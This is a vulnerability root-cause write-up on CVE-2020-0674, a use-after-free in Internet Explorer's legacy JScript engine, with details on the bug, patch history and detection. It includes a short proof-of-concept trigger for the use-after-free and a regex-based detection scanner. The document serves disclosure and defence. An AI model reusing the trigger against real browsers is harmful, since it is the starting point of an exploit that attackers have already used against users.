CVE-2020-0674: JScript Use-after-Free in Internet Explorer

Posted by Maddie Stone, Project Zero (2020-08-05)

Disclosure or Patch Date: 11 February 2020
Product: Microsoft Internet Explorer
Affected Versions: For Windows 10 1903/1909, KB4528760 and previous
First Patched Version: For Windows 10 1903/1909, KB4532693
Issue/Bug Report:  N/A
Patch CL: N/A
Bug-Introducing CL: N/A
Access to the exploit sample? Yes
Reporter(s): Yi Huang (@C0rk1_H) & Kang Yang (@dnpushme) of Qihoo 360 ATA, Clément Lecigne of Google's Threat Analysis Group

Bug Class: use-after-free (UAF)
Vulnerability Details: This vulnerability is almost exactly the same as CVE-2019-1367, except that here it is the named arguments, rather than the arguments array, that are not tracked by the garbage collector.

The vulnerability belongs to the use-after-free bug class in JScript in which variables (represented by the VAR structure) are not properly tracked by the garbage collector. In this case, the named arguments of the Array.sort callback are not tracked while the callback runs. Thus, during the Array.sort callback, it is possible to assign an object to one of the named arguments, have it garbage-collected (as long as it is not referenced anywhere else) and still access it through that argument later, causing the use-after-free.
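The trigger shape that paragraph describes, written out as an added sketch (this is not the in-the-wild sample and not Project Zero's code). It follows the description literally: inside an Array.sort callback a named argument is overwritten with an otherwise unreferenced object, CollectGarbage() is called, and the argument is then read. Everything else is an assumption of the example: the ES3-style syntax, the environment check, and the status strings. It only does anything under the legacy jscript.dll engine (for instance IE11 with `<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">` or a `<script language="JScript.Compact">` tag); under Node.js or jscript9.dll there is no CollectGarbage() and the function reports that it skipped.

```javascript
// Added sketch of the trigger shape described above; NOT the in-the-wild
// exploit sample. Uses ES3 syntax on purpose so it can be pasted into a page
// rendered by the legacy JScript engine (jscript.dll), e.g. IE11 with
//   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
// or a <script language="JScript.Compact"> tag. Under any other engine
// (Node.js, jscript9.dll) CollectGarbage() does not exist, so the function
// returns a "skipped" status instead of running.

function isLegacyJScript() {
    // CollectGarbage() is a legacy-JScript global; if it is absent we are
    // not on the engine this bug lives in.
    return typeof CollectGarbage === "function";
}

function triggerUaf() {
    if (!isLegacyJScript()) {
        return "skipped: CollectGarbage() is not defined";
    }
    var arr = new Array(1, 2);          // two elements: the comparator runs
    var outcome = "callback never ran"; // assumed status string
    arr.sort(function (a, b) {
        // 1. Overwrite a named argument with a fresh object that nothing
        //    else references. While the sort callback runs, the VAR that
        //    holds this object is not tracked by the garbage collector.
        a = new Object();
        // 2. Force a collection. The object is freed even though 'a' still
        //    points at it.
        CollectGarbage();
        // 3. Use the stale reference: this is the use-after-free. With Page
        //    Heap enabled for the process this access is likely to fault;
        //    without it the freed memory may still look intact and the read
        //    may appear to succeed.
        outcome = "accessed freed object: " + typeof a.x;
        return 0;
    });
    return outcome;
}

// Stand-alone run: under legacy JScript this is where a debugger would stop.
triggerUaf();
```

To make the stale access observable rather than silently succeeding, run the page under a debugger with Page Heap enabled for the browser process (gflags /p /enable); that is a general UAF-triage step, not something the write-up states about this sample.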

Is the exploit method known? Yes
Exploit method: This exploit uses the exact same exploit method as CVE-2019-1367, CVE-2019-1429, and CVE-2018-8653. Please see the CVE-2019-1367 root cause analysis for more details on the exploit method.

How do you think you would have found this bug? Code auditing/variant analysis on the other JScript bugs that have been recently disclosed.

(Historical/present/future) context of bug: This vulnerability is a trivial variant of CVE-2019-1367/CVE-2019-1429 and thus shares that bug's long history. There are now 4 JScript vulnerabilities (CVE-2018-8653, CVE-2019-1367, CVE-2019-1429, and CVE-2020-0674) of the same bug class, using the same exploitation method, that have all been exploited in the wild.

Areas/approach for variant analysis: In every JScript callback, check that all of the variables it can reach (the named arguments as well as the arguments array) are tracked by the garbage collector for the whole time the callback runs.

Found variants: N/A

Structural improvements: 
  • Bug classes should be fixed comprehensively, not just fixing each vulnerability individually.
  • Quality and complete patches need to be prioritized. CVE-2019-1367 was not fixed the first time or the second time, and the trivial variant also wasn't patched. This gave the attackers 3 distinct opportunities to exploit the vulnerability against users, which they apparently did. Sharing proposed patches with the reporter could help identify these issues earlier.
  • JScript and Internet Explorer are now considered “legacy” software. Removing them from being accessible by default in the Windows operating system would reduce the attack surface.

Potential detection methods for similar 0-days:
  • Look for any script, outside of a local intranet, that forces the legacy JScript engine as its JS engine.
  • Look for scripts that use the Enumerator object, since it is Microsoft-specific and one of the known methods for turning this UAF into remote code execution.
  • Look for scripts that call CollectGarbage().
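The three detection ideas above as a small static scanner, an added example that is not part of the original write-up. It scans page or script text for legacy-engine selection, the Enumerator object and CollectGarbage(), plus a sort() callback as a lower-weight indicator of my own, and suppresses the engine-selection indicator when the page comes from an intranet origin. The concrete engine-selection strings (X-UA-Compatible with IE=EmulateIE8 or a document mode of 5 to 8, and script language="JScript.Compact" or "JScript.Encode") are the known ways of forcing IE onto the legacy jscript.dll engine; the weights, the thresholds and the two sample pages are constructed for this example.

```javascript
// Added example: static indicator scan for pages that target legacy JScript.
// Constructed sample inputs (not from the in-the-wild exploit): one page that
// shows every indicator, and one ordinary page that just sorts an array.
const SUSPICIOUS_PAGE = `
<html><head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
<script language="JScript.Compact">
var a = new Array(1, 2);
a.sort(function (x, y) { x = new Object(); CollectGarbage(); return x.foo; });
var e = new Enumerator(someCollection);
</script></head></html>`;

const BENIGN_PAGE = `
<html><head><script>
var a = [3, 1, 2]; a.sort(function (x, y) { return x - y; });
</script></head></html>`;

// Indicators. The first two catch the known ways of selecting jscript.dll in
// IE11; the next two are the write-up's Enumerator and CollectGarbage hints;
// the last is a weak hint of my own, since the trigger lives in a sort
// callback. Weights and thresholds are assumptions chosen for the example.
const INDICATORS = [
  { name: "legacy-engine-meta",
    re: /x-ua-compatible[^>]*content\s*=\s*["']?\s*ie\s*=\s*(emulateie[5-8]|[5-8])\b/i,
    weight: 2 },
  { name: "legacy-engine-script",
    re: /<script[^>]*\blanguage\s*=\s*["']?jscript\.(compact|encode)/i,
    weight: 2 },
  { name: "enumerator",    re: /\bnew\s+Enumerator\s*\(/, weight: 3 },
  { name: "collectgarbage", re: /\bCollectGarbage\s*\(/,   weight: 3 },
  { name: "sort-callback", re: /\.sort\s*\(\s*function\b/, weight: 1 },
];

// opts.intranet: true when the page was served from a local intranet host,
// where forcing the legacy engine is routine for line-of-business apps.
function scanPage(html, opts) {
  const intranet = Boolean(opts && opts.intranet);
  const hits = [];
  let score = 0;
  for (const ind of INDICATORS) {
    if (!ind.re.test(html)) continue;
    if (ind.name.startsWith("legacy-engine") && intranet) continue;
    hits.push(ind.name);
    score += ind.weight;
  }
  // Enumerator or CollectGarbage alone already reach "review"; either of
  // them plus legacy-engine selection reaches "suspicious". A lone sort()
  // callback stays "clean" so ordinary pages are not flagged.
  const verdict = score >= 5 ? "suspicious" : score >= 3 ? "review" : "clean";
  return { hits, score, verdict };
}

// Stand-alone run.
console.log(JSON.stringify(scanPage(SUSPICIOUS_PAGE)));
console.log(JSON.stringify(scanPage(SUSPICIOUS_PAGE, { intranet: true })));
console.log(JSON.stringify(scanPage(BENIGN_PAGE)));
```

Regexes over source text only catch the unobfuscated case; an attacker can reach the same globals through string concatenation or computed property names, so this is a first-pass filter to pair with runtime hooks on CollectGarbage and Enumerator, not a replacement for them.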

Other references:  
